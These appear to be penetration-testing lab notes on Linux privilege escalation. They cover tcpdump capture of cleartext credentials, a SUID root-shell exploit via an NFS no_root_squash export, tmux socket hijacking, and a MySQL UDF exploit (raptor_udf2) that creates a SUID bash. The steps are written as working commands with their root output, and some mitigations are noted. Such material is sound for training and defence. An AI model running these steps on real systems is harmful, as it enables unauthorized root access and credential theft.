Miscellaneous Techniques
Passive Traffic Capture
If tcpdump is installed and an unprivileged user is permitted to run it (for example via file capabilities or sudo rights), that user may be able to capture network traffic, including, in some cases, credentials passed in cleartext.
tcpdump -i 1 -w .d.pcap -s 0 'not tcp port 22' &
Examine data - Tools
Weak NFS Privileges
NFS (ports 2049, 111)
showmount -e 10.129.2.12
When an NFS volume is created, various options can be set:
root_squash
If the root user is used to access NFS shares, it is mapped to the nfsnobody user, an unprivileged account. Any files created or uploaded by the remote root user are therefore owned by nfsnobody, which prevents an attacker from planting root-owned binaries with the SUID bit set.
no_root_squash
Remote users connecting to the share as their local root user are able to create files on the NFS server as root. This allows the creation of malicious scripts or programs with the SUID bit set, which is why an export with no_root_squash should be limited to a specific, trusted client list rather than a wildcard host (*) as in the example below.
$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/var/nfs/general *(rw,no_root_squash)
/tmp *(rw,no_root_squash)
Create a SUID binary that spawns a shell (the example below runs /bin/bash) using our local root user. We can then mount the exported /tmp directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit.
htb@NIX02:~$ cat shell.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
/*
 * Demonstration payload for the no_root_squash misconfiguration shown above:
 * the binary only yields a root shell once it is root-owned and has the SUID
 * bit set on the NFS server, at which point setuid(0)/setgid(0) set the
 * process's user and group IDs to 0 and system() starts /bin/bash.
 * Note: system() is declared in <stdlib.h>, which is not included here, and
 * the return values of setuid()/setgid() are not checked.
 */
int main(void)
{
setuid(0); setgid(0); system("/bin/bash"); /* effective only when the file is a root-owned SUID binary */
}
gcc shell.c -o shell
root@Pwnbox:~$ sudo mount -t nfs 10.129.2.12:/tmp /mnt
root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shell
htb@NIX02:/tmp$ ./shell
root@NIX02:/tmp# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(htb)
References
Example


osboxes@osboxes:~/Desktop$ sudo mount -t nfs 10.129.197.187:/tmp /mnt
osboxes@osboxes:~/Desktop$ cd /tmp
htb-student@NIX02:~$ cd /tmp
htb-student@NIX02:/tmp$ cp /bin/bash .

osboxes@osboxes:/mnt$ sudo chown root:root bash
osboxes@osboxes:/mnt$ sudo chmod +s bash

htb-student@NIX02:/tmp$ ./bash -p

Hijacking Tmux Sessions
$ ps aux | grep tmux
root 4806 0.0 0.1 29416 3204 ? Ss 06:27 0:00 tmux -S /shareds new -s debugsess
$ ls -la /shareds
srw-rw---- 1 root devs 0 Sep 1 06:27 /shareds
$ id
uid=1000(htb) gid=1000(htb) groups=1000(htb),1011(devs)
$ tmux -S /shareds
id
uid=0(root) gid=0(root) groups=0(root)
MySQL running as root
ps -ef | grep mysql

The MySQL service is running as root, so any user-defined function the server loads executes with root privileges; running mysqld as a dedicated unprivileged user and restricting server-side file writes with secure_file_priv removes this path.
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
# 1 - id
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
# 2 - /bin/bash
* mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
* mysql> exit
* /tmp/rootbash -p